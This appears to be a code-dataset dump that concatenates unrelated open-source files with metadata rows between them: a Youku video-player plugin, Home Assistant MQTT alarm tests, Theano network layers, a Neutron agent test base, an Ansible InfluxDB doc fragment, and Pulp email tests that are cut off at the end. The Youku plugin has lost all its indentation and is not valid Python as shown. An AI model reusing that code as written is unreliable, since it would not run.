# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from youku.youku_scan import scan_page
from youku.youku_to_flvcd import YouToFlvcd
from youku.youku_web_parse import YoukuWebParse
from youku.youku_web import music_type_dict, comic_type_dict, youku_root
from youku.youku_web import zy_type_dict, movie_type_dict, tv_type_dict
from widget.utils import ScanTreeview
import gtk
title = "优酷插件"
class_name = "PluginYouku"
version = "1.0"
auto_check = False
author = "hongmingman [email protected]"
about = '''优酷视频的插件,由社区爱好者开发。我们不对使用该插件造成的任何结果负责。如有问题,请联系插件原作者。'''
class PluginYouku(object):
def __init__(self, this):
self.this = this
self.__init_values()
#self.__init_gui()
def __init_values(self):
#
self.youku_web_parse = YoukuWebParse()
#
self.show_check = auto_check
self.tree_view = self.this.gui.play_list_view.tree_view
self.tree_view.connect_event("treeview-press-event", self.__treeview_press_event)
self.tree_view.connect_event("treeview-double-event", self.__treeview_double_event)
self.note_book = self.this.gui.play_list_view.note_book
        # Initialize the network play list.
self.__init_tree_view()
def __init_tree_view(self):
self.youku_root = self.tree_view.nodes.add("优酷视频")
self.youku_root.addr = "http://www.youku.com"
        # Initialize the entries under the root node.
for key, addr in youku_root.items():
node = self.youku_root.nodes.add(key)
node.addr = addr
self.tv_node = self.youku_root.nodes[0]
self.movie_node = self.youku_root.nodes[1]
self.zy_node = self.youku_root.nodes[2]
self.music_node = self.youku_root.nodes[3]
self.comic_node = self.youku_root.nodes[4]
#
self.__init_type_lists()
def __init_type_lists(self):
for key in tv_type_dict.keys():
node = self.tv_node.nodes.add(key)
node.addr = tv_type_dict[key]
for key in movie_type_dict.keys():
node = self.movie_node.nodes.add(key)
node.addr = movie_type_dict[key]
for key in zy_type_dict.keys():
node = self.zy_node.nodes.add(key)
node.addr = zy_type_dict[key]
for key in music_type_dict.keys():
node = self.music_node.nodes.add(key)
node.addr = music_type_dict[key]
for key in comic_type_dict.keys():
node = self.comic_node.nodes.add(key)
node.addr = comic_type_dict[key]
'''
#info_list, page_num, all_sum = self.youku_web_parse.parse_web(v_olist_dict["热血"])
for info in info_list:
node = re_xue_node.nodes.add(info[0])
node.addr = info[1]
'''
def __treeview_press_event(self, treeview, node):
if node.leave == 2 and node.nodes == []:
scan_treeview = ScanTreeview(self.youku_web_parse, node.addr, True)
scan_treeview.connect("scan-end-event", self.scan_treeview_end_event, node)
scan_treeview.run()
elif (node.leave == 3 and
node.nodes == [] and
node.parent.this.parent.this.text not in ["音乐", "电影"]):
scan_treeview = ScanTreeview(self.youku_web_parse, node.addr, False)
scan_treeview.connect("scan-end-event", self.scan_treeview_end_event, node)
scan_treeview.run()
def __treeview_double_event(self, tree_view, node):
if node.leave == 4:
self.add_to_play_list(node)
elif node.leave == 3:
            # Check for music or movie nodes: movies and music are not handled at this tree level.
if node.parent.this.parent.this.text in ["音乐"]:
self.add_to_play_list(node)
elif node.parent.this.parent.this.text in ["电影"]:
movie_info = self.youku_web_parse.scan_movie_leave(node.addr)
if movie_info:
save_addr = node.addr
node.addr = movie_info[0]
self.add_to_play_list(node)
node.addr = save_addr
else:
self.this.show_messagebox("优酷收费视频,无法播放...")
def scan_treeview_end_event(self, scan_tv, temp_list, node):
for addr, name in temp_list:
temp_node = node.nodes.add(name)
temp_node.addr = addr
if temp_list:
node.is_expanded = True
def add_to_play_list(self, node):
flvcd = YouToFlvcd()
scan_treeview = ScanTreeview(flvcd, node.addr, 2)
scan_treeview.connect("scan-end-event", self.scan_end_add_to_list_event, node)
scan_treeview.run()
#flvcd_addr_list = flvcd.parse(node.addr)
def scan_end_add_to_list_event(self, scan_tv, temp_list, node):
flvcd_addr_list = temp_list
index = 0
for addr in flvcd_addr_list:
check = False
if not index:
check = True
if len(flvcd_addr_list) > 1:
text = node.text + "-" + str(index)
else:
text = node.text
self.this.add_net_to_play_list(
text,
addr,
"优酷视频", check)
index += 1
def __init_gui(self):
self.scan_win = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.scrol_win = gtk.ScrolledWindow()
self.scan_entry_hbox = gtk.HBox()
self.scan_entry = gtk.Entry()
self.scan_btn = gtk.Button("搜索")
self.scan_btn.connect("clicked", self.scan_btn_clicked)
self.scan_entry_hbox.pack_start(self.scan_entry, False, False)
self.scan_entry_hbox.pack_start(self.scan_btn, False, False)
#
self.vbox = gtk.VBox()
self.vbox.pack_start(self.scan_entry_hbox, False, False)
self.scrol_win.add_with_viewport(self.vbox)
self.scan_win.add(self.scrol_win)
#
w, h = 300, 300
self.scan_win.set_size_request(w, h)
def scan_btn_clicked(self, widget):
scan_text = self.scan_entry.get_text()
scan_info = scan_page(1, scan_text)
        info_list = scan_info[0]  # list of result info.
for info_list in scan_info[0]:
btn = gtk.Button(info_list[0] + info_list[1] + "时间" + info_list[2] + info_list[3])
btn.connect("clicked", self.btn_connect_addr_to, info_list)
self.vbox.pack_start(btn, False, False)
self.vbox.show_all()
#######################################
        #page_num = scan_info[1]  # number of results per page.
        #sum = scan_info[2]  # total number of search results.
        #page_sum = min(sum/page_num, 100)
        #print "total pages:", page_sum
def btn_connect_addr_to(self, widget, info):
flvcd = YouToFlvcd()
flvcd_addr_list = flvcd.parse(info[1])
index = 0
for addr in flvcd_addr_list:
check = False
if not index:
check = True
self.this.add_net_to_play_list(info[0]+ str(index),
addr,
info[3], check)
index += 1
def show_scan_win(self):
if self.show_check:
self.scan_win.show_all()
def hide_scan_win(self):
self.scan_win.hide_all()
def start_plugin(self):
#print "start_plugin."
self.show_check = True
#self.show_scan_win()
        self.note_book.show_title()  # Bug fix: keep the title visible, otherwise the local list cannot be reached while the network list is shown.
self.note_book.layout_show_check = False
self.note_book.set_child_size()
        # Expand the root node.
self.youku_root.is_expanded = True
def stop_plugin(self):
#print "end_plugin..."
self.show_check = False
        # Remove the network play list nodes.
        # Then hide the network list.
self.note_book.hide_title()
self.tree_view.clear()
self.note_book.layout_show_check = True
self.note_book.set_child_size()
| gpl-3.0 | -5,753,949,909,109,979,000 | 35.443038 | 94 | 0.571842 | false |
devdelay/home-assistant | tests/components/alarm_control_panel/test_mqtt.py | 8 | 7707 | """The tests the MQTT alarm control panel component."""
import unittest
from homeassistant.bootstrap import _setup_component
from homeassistant.const import (
STATE_ALARM_DISARMED, STATE_ALARM_ARMED_HOME, STATE_ALARM_ARMED_AWAY,
STATE_ALARM_PENDING, STATE_ALARM_TRIGGERED, STATE_UNKNOWN)
from homeassistant.components import alarm_control_panel
from tests.common import (
mock_mqtt_component, fire_mqtt_message, get_test_home_assistant)
CODE = 'HELLO_CODE'
class TestAlarmControlPanelMQTT(unittest.TestCase):
"""Test the manual alarm module."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.mock_publish = mock_mqtt_component(self.hass)
def tearDown(self): # pylint: disable=invalid-name
"""Stop down stuff we started."""
self.hass.stop()
def test_fail_setup_without_state_topic(self):
"""Test for failing with no state topic."""
self.hass.config.components = ['mqtt']
assert not _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'command_topic': 'alarm/command'
}
})
def test_fail_setup_without_command_topic(self):
"""Test failing with no command topic."""
self.hass.config.components = ['mqtt']
assert not _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'state_topic': 'alarm/state'
}
})
def test_update_state_via_state_topic(self):
"""Test updating with via state topic."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
}
})
entity_id = 'alarm_control_panel.test'
self.assertEqual(STATE_UNKNOWN,
self.hass.states.get(entity_id).state)
for state in (STATE_ALARM_DISARMED, STATE_ALARM_ARMED_HOME,
STATE_ALARM_ARMED_AWAY, STATE_ALARM_PENDING,
STATE_ALARM_TRIGGERED):
fire_mqtt_message(self.hass, 'alarm/state', state)
self.hass.pool.block_till_done()
self.assertEqual(state, self.hass.states.get(entity_id).state)
def test_ignore_update_state_if_unknown_via_state_topic(self):
"""Test ignoring updates via state topic."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
}
})
entity_id = 'alarm_control_panel.test'
self.assertEqual(STATE_UNKNOWN,
self.hass.states.get(entity_id).state)
fire_mqtt_message(self.hass, 'alarm/state', 'unsupported state')
self.hass.pool.block_till_done()
self.assertEqual(STATE_UNKNOWN, self.hass.states.get(entity_id).state)
def test_arm_home_publishes_mqtt(self):
"""Test publishing of MQTT messages while armed."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
}
})
alarm_control_panel.alarm_arm_home(self.hass)
self.hass.pool.block_till_done()
self.assertEqual(('alarm/command', 'ARM_HOME', 0, False),
self.mock_publish.mock_calls[-1][1])
def test_arm_home_not_publishes_mqtt_with_invalid_code(self):
"""Test not publishing of MQTT messages with invalid code."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
'code': '1234'
}
})
call_count = self.mock_publish.call_count
alarm_control_panel.alarm_arm_home(self.hass, 'abcd')
self.hass.pool.block_till_done()
self.assertEqual(call_count, self.mock_publish.call_count)
def test_arm_away_publishes_mqtt(self):
"""Test publishing of MQTT messages while armed."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
}
})
alarm_control_panel.alarm_arm_away(self.hass)
self.hass.pool.block_till_done()
self.assertEqual(('alarm/command', 'ARM_AWAY', 0, False),
self.mock_publish.mock_calls[-1][1])
def test_arm_away_not_publishes_mqtt_with_invalid_code(self):
"""Test not publishing of MQTT messages with invalid code."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
'code': '1234'
}
})
call_count = self.mock_publish.call_count
alarm_control_panel.alarm_arm_away(self.hass, 'abcd')
self.hass.pool.block_till_done()
self.assertEqual(call_count, self.mock_publish.call_count)
def test_disarm_publishes_mqtt(self):
"""Test publishing of MQTT messages while disarmed."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
}
})
alarm_control_panel.alarm_disarm(self.hass)
self.hass.pool.block_till_done()
self.assertEqual(('alarm/command', 'DISARM', 0, False),
self.mock_publish.mock_calls[-1][1])
def test_disarm_not_publishes_mqtt_with_invalid_code(self):
"""Test not publishing of MQTT messages with invalid code."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
'code': '1234'
}
})
call_count = self.mock_publish.call_count
alarm_control_panel.alarm_disarm(self.hass, 'abcd')
self.hass.pool.block_till_done()
self.assertEqual(call_count, self.mock_publish.call_count)
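# For reference, the notifier configuration exercised by these tests maps to a
# configuration.yaml entry shaped roughly like the following (illustrative
# sketch only; topics and code are the placeholder values used above):
#
#   alarm_control_panel:
#     platform: mqtt
#     name: test
#     state_topic: alarm/state
#     command_topic: alarm/command
#     code: "1234"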
| mit | -7,653,025,829,172,212,000 | 38.321429 | 78 | 0.57052 | false |
saebrahimi/Emotion-Recognition-EmotiW2015 | common/layers.py | 2 | 13715 | import theano
from theano import tensor as T
from theano.tensor.nnet import conv
from theano.tensor.signal.downsample import max_pool_2d
import numpy as np
class Layer(object):
def __init__(self, inputs, inputs_shape=None):
"""
Useful to get outputs shape
"""
if isinstance(inputs, Layer):
self.inputs = inputs.outputs
self.inputs_shape = inputs.outputs_shape
else:
assert(inputs_shape is not None)
self.inputs = inputs
self.inputs_shape = inputs_shape
print '({0}) input shape {1}'.format(self.name, self.inputs_shape)
class RandFlip(Layer):
def __init__(self, inputs, image_shape, name, theano_rng, mode_var):
# one window for whole batch
self.name = name
super(RandFlip, self).__init__(inputs, image_shape)
self.theano_rng = theano_rng
self.mode = mode_var
self.params = []
self.flipped = self.inputs[:,:,:,::-1]
self.doflip = self.theano_rng.binomial(
n=1, p=.5, size=(self.inputs.shape[0],))
# if train mode: randomly flip, else don't flip
self.outputs = T.switch(
self.mode,
self.inputs,
T.switch(self.doflip.dimshuffle(0,'x','x','x'),
self.flipped, self.inputs))
#self.outputs = inputs
self.outputs_shape = self.inputs_shape
class ConvLayer(Layer):
def __init__(self, rng, inputs, filter_shape,
name, image_shape=None, pad=0, init_scale=None):
"""
Convolutional layer
Args
----
rng: instance of numpy.random.RandomState
inputs: symbolic theano variable
        filter_shape: tuple of 4 ints (channels_out, channels_in, filter_rows, filter_cols)
"""
self.name = name
super(ConvLayer, self).__init__(inputs, image_shape)
assert self.inputs_shape[1] == filter_shape[1]
self.rng = rng
self.filter_shape = filter_shape
self.pad = pad
if init_scale is None:
# if we don't specify a scale for weight initialization,
# we use the formula
# 1/sqrt(number of weights in each filter)
init_scale = 1. / np.sqrt(
filter_shape[1] *
filter_shape[2] *
filter_shape[3])
self.init_scale = init_scale
self.W = theano.shared(
np.asarray(
rng.uniform(low=-self.init_scale, high=self.init_scale,
size=self.filter_shape),
dtype=theano.config.floatX
), name='{0}_W'.format(self.name)
)
self.params = [self.W]
# if padding is greater than zero, we insert the inputs into
# the center of a larger zero array, effectively adding zero
# borders
if self.pad > 0:
self.padded_inputs = T.set_subtensor(
T.zeros((self.inputs_shape[0],
self.inputs_shape[1],
self.inputs_shape[2] + 2 * self.pad,
self.inputs_shape[3] + 2 * self.pad),
dtype=self.inputs.dtype)[:, :, pad:-pad, pad:-pad],
self.inputs
)
else:
self.padded_inputs = self.inputs
self.padded_inputs_shape = (
self.inputs_shape[0],
self.inputs_shape[1],
self.inputs_shape[2] + 2 * self.pad,
self.inputs_shape[3] + 2 * self.pad)
self.outputs = conv.conv2d(
input=self.padded_inputs,
filters=self.W,
filter_shape=self.filter_shape,
image_shape=self.padded_inputs_shape
)
self.outputs_shape = (
self.inputs_shape[0], self.filter_shape[0],
self.inputs_shape[2] + 2 * self.pad - self.filter_shape[2] + 1,
self.inputs_shape[3] + 2 * self.pad - self.filter_shape[3] + 1)
class MaxPoolLayer(Layer):
def __init__(self, inputs, pool_size, name, ignore_border=True, stride=None):
"""
Max pooling layer
"""
self.name = name
super(MaxPoolLayer, self).__init__(inputs)
self.pool_size = pool_size
self.ignore_border = ignore_border
if stride is None:
stride = pool_size
self.stride = stride
self.params = []
self.outputs = max_pool_2d(
input=self.inputs,
ds=self.pool_size,
ignore_border=self.ignore_border,
st=self.stride
)
self.outputs_shape = (
self.inputs_shape[0],
self.inputs_shape[1],
#int(np.ceil((self.inputs_shape[2] - pool_size[0]) / np.float32(stride[0]))) + 1,
#int(np.ceil((self.inputs_shape[3] - pool_size[1]) / np.float32(stride[1]))) + 1
(self.inputs_shape[2] - pool_size[0]) // stride[0] + 1,
(self.inputs_shape[3] - pool_size[1]) // stride[1] + 1
)
class ConvBiasLayer(Layer):
def __init__(self, inputs, name):
"""
Add bias
"""
self.name = name
super(ConvBiasLayer, self).__init__(inputs)
self.b = theano.shared(
np.zeros(
(self.inputs_shape[1],), dtype=theano.config.floatX
), name='{0}_b'.format(self.name)
)
self.params = [self.b]
self.outputs = self.inputs + self.b.dimshuffle('x', 0, 'x', 'x')
self.outputs_shape = self.inputs_shape
class RandCropAndFlip(Layer):
def __init__(self, inputs, image_shape, patch_size, name, theano_rng, mode_var):
# one window for whole batch
self.name = name
super(RandCropAndFlip, self).__init__(inputs, image_shape)
self.patch_size = patch_size
self.theano_rng = theano_rng
self.mode = mode_var
self.params = []
print 'self.inputs_shape: {0}'.format(self.inputs_shape, )
print 'patch_size: {0}'.format(patch_size, )
print 'self.inputs_shape[2] - patch_size[0]: {0}'.format(self.inputs_shape[2] - patch_size[0], )
        print 'self.inputs_shape[3] - patch_size[1]: {0}'.format(self.inputs_shape[3] - patch_size[1], )
self.rand_row_coord = self.theano_rng.random_integers(
low=0, high=self.inputs_shape[2] - patch_size[0])
self.rand_col_coord = self.theano_rng.random_integers(
low=0, high=self.inputs_shape[3] - patch_size[1])
self.center_row_coord = (self.inputs.shape[2] - patch_size[0]) // 2
self.center_col_coord = (self.inputs.shape[3] - patch_size[1]) // 2
self.row_coord = T.switch(
self.mode, self.center_row_coord, self.rand_row_coord)
self.col_coord = T.switch(
self.mode, self.center_col_coord, self.rand_col_coord)
self.patches = self.inputs[:,
:,
self.row_coord:self.row_coord + patch_size[0],
self.col_coord:self.col_coord + patch_size[1]]
self.flipped = self.patches[:,:,:,::-1]
self.doflip = self.theano_rng.binomial(
n=1, p=.5, size=(self.inputs.shape[0],))
# if train mode: randomly flip, else don't flip
self.outputs = T.switch(
self.mode,
self.patches,
T.switch(self.doflip.dimshuffle(0,'x','x','x'), self.flipped, self.patches))
self.outputs_shape = self.inputs_shape[:2] + self.patch_size
class Dropout(Layer):
def __init__(self, inputs, dropout_rate, name, theano_rng, mode_var, inputs_shape=None):
"""Dropout
Args
----
mode_var: symbolic variable, which has value 0 during training and 1
during test time
"""
self.name = name
super(Dropout, self).__init__(inputs, inputs_shape)
self.dropout_rate = theano.shared(
dropout_rate, '{0}_dropout_rate'.format(name))
self.theano_rng = theano_rng
self.mode = mode_var
self.params = []
self.mask = self.theano_rng.binomial(
n=1, p=1 - dropout_rate, size=self.inputs_shape,
dtype=theano.config.floatX)
self.outputs = T.switch(self.mode,
self.inputs * (1. - dropout_rate),
self.inputs * self.mask)
self.outputs_shape = self.inputs_shape
class AffineLayer(Layer):
def __init__(self, rng, inputs, nouts,
name, init_scale=None, nins=None, with_bias=True,
inputs_shape=None):
"""
Fully connected layer with bias option
Args
----
rng: instance of numpy.random.RandomState
"""
self.name = name
super(AffineLayer, self).__init__(inputs, inputs_shape=inputs_shape)
self.rng = rng
self.nins = self.inputs_shape[-1]
self.nouts = nouts
if init_scale is None:
# if we don't specify a scale for weight initialization,
# we use the formula
# 1/sqrt(number of weights in each filter)
init_scale = 1. / np.sqrt(self.nins)
self.init_scale = init_scale
self.with_bias = with_bias
self.W = theano.shared(
np.asarray(
rng.uniform(low=-self.init_scale, high=self.init_scale,
size=(self.nins, self.nouts)),
dtype=theano.config.floatX
), name='{0}_W'.format(self.name)
)
self.params = [self.W]
self.outputs = T.dot(self.inputs, self.W)
if with_bias:
self.b = theano.shared(
np.zeros(
self.nouts, dtype=theano.config.floatX
), name='{0}_b'.format(self.name)
)
self.params.append(self.b)
self.outputs = self.outputs + self.b
self.outputs_shape = (self.inputs_shape[0], self.nouts)
class Relu(Layer):
def __init__(self, inputs, name):
"""
Relu activation function
"""
self.name = name
super(Relu, self).__init__(inputs)
self.params = []
self.outputs = T.switch(self.inputs < 0, 0, self.inputs)
self.outputs_shape = self.inputs_shape
class RectifiedTanh(Layer):
def __init__(self, inputs, name):
"""
        Rectified tanh activation function
"""
self.name = name
super(RectifiedTanh, self).__init__(inputs)
self.params = []
self.outputs = T.switch(self.inputs < 0, 0, T.tanh(self.inputs))
self.outputs_shape = self.inputs_shape
class Concat(Layer):
def __init__(self, inputs_list, name, axis,
inputs_shape_list=None):
"""
Concatenation layer
"""
self.name = name
self.axis = axis
if inputs_shape_list is None:
inputs_shape_list = [None] * len(inputs_list)
assert len(inputs_shape_list) == len(inputs_list)
self.inputs = []
self.inputs_shape = []
for i, inp in enumerate(inputs_list):
if isinstance(inp, Layer):
self.inputs.append(inp.outputs)
self.inputs_shape.append(inp.outputs_shape)
else:
assert(inputs_shape_list[i] is not None)
self.inputs.append(inp)
self.inputs_shape.append(inputs_shape_list[i])
self.params = []
# concatenate the inputs
self.outputs = T.concatenate(self.inputs, axis=axis)
self.outputs_shape = list(self.inputs_shape[0])
for i in range(1, len(self.inputs_shape)):
self.outputs_shape[axis] += self.inputs_shape[i][axis]
class Softmax(Layer):
def __init__(self, inputs, name):
"""
Softmax
"""
self.name = name
super(Softmax, self).__init__(inputs)
self.params = []
self.outputs = T.nnet.softmax(self.inputs)
self.outputs_shape = self.inputs_shape
class Sigmoid(Layer):
def __init__(self, inputs, name):
"""
Sigmoid
"""
self.name = name
super(Sigmoid, self).__init__(inputs)
self.params = []
self.outputs = T.nnet.sigmoid(self.inputs)
self.outputs_shape = self.inputs_shape
class Reshape(Layer):
def __init__(self, inputs, shape, name):
"""
Reshaping
"""
self.name = name
super(Reshape, self).__init__(inputs)
self.params = []
assert(np.prod(self.inputs_shape) == np.prod(shape))
self.outputs = T.reshape(self.inputs, shape)
self.outputs_shape = shape
class Composite(Layer):
def __init__(self, layers, name):
"""
Collection of layers used in fusion
"""
self.layers = layers
self.name = name
super(Composite, self).__init__(self.layers[0].inputs,
self.layers[0].inputs_shape)
self.params = []
for layer in self.layers:
self.params.extend(layer.params)
self.outputs = self.layers[-1].outputs
self.outputs_shape = self.layers[-1].outputs_shape
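if __name__ == '__main__':
    # Minimal usage sketch (illustrative only; batch size and image/filter
    # shapes below are arbitrary placeholder values): build a small
    # conv -> bias -> relu -> pool -> affine -> softmax graph on a dummy input.
    rng = np.random.RandomState(0)
    x = T.tensor4('x')
    conv = ConvLayer(rng, x, filter_shape=(8, 3, 5, 5), name='conv1',
                     image_shape=(16, 3, 32, 32))
    bias = ConvBiasLayer(conv, name='conv1_bias')
    relu = Relu(bias, name='conv1_relu')
    pool = MaxPoolLayer(relu, pool_size=(2, 2), name='pool1')
    flat = Reshape(pool, (16, 8 * 14 * 14), name='flatten')
    fc = AffineLayer(rng, flat, nouts=10, name='fc')
    probs = Softmax(fc, name='softmax')
    # Expect (16, 10): one row of class probabilities per example.
    print probs.outputs_shape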
| mit | -448,630,419,246,895,500 | 29.456422 | 104 | 0.520379 | false |
shakamunyi/neutron-vrrp | neutron/tests/unit/ofagent/ofa_test_base.py | 2 | 2430 | # Copyright (C) 2014 VA Linux Systems Japan K.K.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Fumihiko Kakuma, VA Linux Systems Japan K.K.
# @author: YAMAMOTO Takashi, VA Linux Systems Japan K.K.
import mock
from oslo.config import cfg
from neutron.openstack.common import importutils
from neutron.tests import base
from neutron.tests.unit.ofagent import fake_oflib
class OFAAgentTestBase(base.BaseTestCase):
_AGENT_NAME = 'neutron.plugins.ofagent.agent.ofa_neutron_agent'
def setUp(self):
self.fake_oflib_of = fake_oflib.patch_fake_oflib_of()
self.fake_oflib_of.start()
self.addCleanup(self.fake_oflib_of.stop)
self.mod_agent = importutils.import_module(self._AGENT_NAME)
super(OFAAgentTestBase, self).setUp()
self.ryuapp = mock.Mock()
def setup_config(self):
cfg.CONF.set_default('firewall_driver',
'neutron.agent.firewall.NoopFirewallDriver',
group='SECURITYGROUP')
cfg.CONF.register_cli_opts([
cfg.StrOpt('ofp-listen-host', default='',
help='openflow listen host'),
cfg.IntOpt('ofp-tcp-listen-port', default=6633,
help='openflow tcp listen port')
])
cfg.CONF.set_override('root_helper', 'fake_helper', group='AGENT')
def _mk_test_dp(self, name):
ofp = importutils.import_module('ryu.ofproto.ofproto_v1_3')
ofpp = importutils.import_module('ryu.ofproto.ofproto_v1_3_parser')
dp = mock.Mock()
dp.ofproto = ofp
dp.ofproto_parser = ofpp
dp.__repr__ = mock.Mock(return_value=name)
return dp
def _mk_test_br(self, name):
dp = self._mk_test_dp(name)
br = mock.Mock()
br.datapath = dp
br.ofproto = dp.ofproto
br.ofparser = dp.ofproto_parser
return br
| apache-2.0 | -1,743,874,124,726,565,000 | 36.384615 | 78 | 0.641564 | false |
Azulinho/ansible | lib/ansible/utils/module_docs_fragments/influxdb.py | 1 | 1914 | # Copyright: (c) 2017, Ansible Project
# Copyright: (c) 2017, Abhijeet Kasurde ([email protected])
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
# Parameters for influxdb modules
DOCUMENTATION = '''
options:
hostname:
description:
- The hostname or IP address on which InfluxDB server is listening
required: true
username:
description:
- Username that will be used to authenticate against InfluxDB server
default: root
password:
description:
- Password that will be used to authenticate against InfluxDB server
default: root
port:
description:
- The port on which InfluxDB server is listening
default: 8086
database_name:
description:
- Name of the database.
required: true
validate_certs:
description:
- If set to C(no), the SSL certificates will not be validated.
- This should only set to C(no) used on personally controlled sites using self-signed certificates.
default: true
version_added: "2.5"
ssl:
description:
- Use https instead of http to connect to InfluxDB server.
default: False
version_added: "2.5"
timeout:
description:
- Number of seconds Requests will wait for client to establish a connection.
default: None
version_added: "2.5"
retries:
description:
- Number of retries client will try before aborting.
- C(0) indicates try until success.
default: 3
version_added: "2.5"
use_udp:
description:
- Use UDP to connect to InfluxDB server.
default: False
version_added: "2.5"
udp_port:
description:
- UDP port to connect to InfluxDB server.
default: 4444
version_added: "2.5"
proxies:
description:
- HTTP(S) proxy to use for Requests to connect to InfluxDB server.
default: None
version_added: "2.5"
'''
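    # Illustrative playbook snippet for a module that includes this fragment
    # (module name and values are placeholders, e.g. influxdb_database):
    #
    #   - name: Create a database over TLS
    #     influxdb_database:
    #       hostname: influx.example.com
    #       username: admin
    #       password: secret
    #       database_name: metrics
    #       ssl: true
    #       validate_certs: false
    #       timeout: 10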
| gpl-3.0 | 3,383,564,692,926,135,300 | 27.567164 | 103 | 0.684953 | false |
nthien/pulp | server/test/unit/server/event/test_email.py | 9 | 6189 | import dummy_threading
import smtplib
import unittest
try:
from email.parser import Parser
except ImportError:
# for python 2.4
from email.Parser import Parser
# needed to create unserializable ID
from bson.objectid import ObjectId as _test_objid
import mock
from pulp.server.compat import json
from pulp.server.config import config
from pulp.server.event import data, mail
from pulp.server.managers import factory
class TestSendEmail(unittest.TestCase):
@mock.patch('smtplib.SMTP')
def test_basic(self, mock_smtp):
# send a message
mail._send_email('hello', 'stuff', '[email protected]')
mock_smtp.assert_called_once_with(host=config.get('email', 'host'),
port=config.getint('email', 'port'))
# verify
mock_sendmail = mock_smtp.return_value.sendmail
self.assertEqual(mock_sendmail.call_count, 1)
self.assertEqual(mock_sendmail.call_args[0][0],
config.get('email', 'from'))
self.assertEqual(mock_sendmail.call_args[0][1], '[email protected]')
# verify message attributes
message = Parser().parsestr(mock_sendmail.call_args[0][2])
self.assertEqual(message.get_payload(), 'stuff')
self.assertEqual(message.get('Subject', None), 'hello')
self.assertEqual(message.get('From', None), config.get('email', 'from'))
self.assertEqual(message.get('To', None), '[email protected]')
@mock.patch('smtplib.SMTP')
@mock.patch('logging.Logger.error')
def test_connect_failure(self, mock_error, mock_smtp):
mock_smtp.side_effect = smtplib.SMTPConnectError(123, 'aww crap')
mail._send_email('hello', 'stuff', '[email protected]')
self.assertTrue(mock_error.called)
@mock.patch('smtplib.SMTP')
@mock.patch('logging.Logger.error')
def test_send_failure(self, mock_error, mock_smtp):
mock_smtp.return_value.sendmail.side_effect = smtplib.SMTPRecipientsRefused(
['[email protected]'])
mail._send_email('hello', 'stuff', '[email protected]')
self.assertTrue(mock_error.called)
class TestHandleEvent(unittest.TestCase):
def setUp(self):
self.notifier_config = {
'subject': 'hello',
'addresses': ['[email protected]', '[email protected]']
}
self.event = mock.MagicMock()
self.event.payload = 'stuff'
self.event.data.return_value = self.event.payload
# don't actually spawn a thread
@mock.patch('threading.Thread', new=dummy_threading.Thread)
@mock.patch('ConfigParser.SafeConfigParser.getboolean', return_value=False)
@mock.patch('smtplib.SMTP')
def test_email_disabled(self, mock_smtp, mock_getbool):
mail.handle_event(self.notifier_config, self.event)
self.assertFalse(mock_smtp.called)
# don't actually spawn a thread
@mock.patch('threading.Thread', new=dummy_threading.Thread)
@mock.patch('ConfigParser.SafeConfigParser.getboolean', return_value=True)
@mock.patch('smtplib.SMTP')
def test_email_enabled(self, mock_smtp, mock_getbool):
mail.handle_event(self.notifier_config, self.event)
# verify
self.assertEqual(mock_smtp.call_count, 2)
mock_sendmail = mock_smtp.return_value.sendmail
self.assertEqual(mock_sendmail.call_args[0][0],
config.get('email', 'from'))
self.assertTrue(mock_sendmail.call_args[0][1] in self.notifier_config['addresses'])
# verify message attributes
message = Parser().parsestr(mock_sendmail.call_args[0][2])
self.assertEqual(json.loads(message.get_payload()), self.event.payload)
self.assertEqual(message.get('Subject', None), self.notifier_config['subject'])
self.assertEqual(message.get('From', None), config.get('email', 'from'))
self.assertTrue(message.get('To', None) in self.notifier_config['addresses'])
@mock.patch('pulp.server.event.data.task_serializer')
# tests bz 1099945
@mock.patch('threading.Thread', new=dummy_threading.Thread)
@mock.patch('ConfigParser.SafeConfigParser.getboolean', return_value=True)
@mock.patch('smtplib.SMTP')
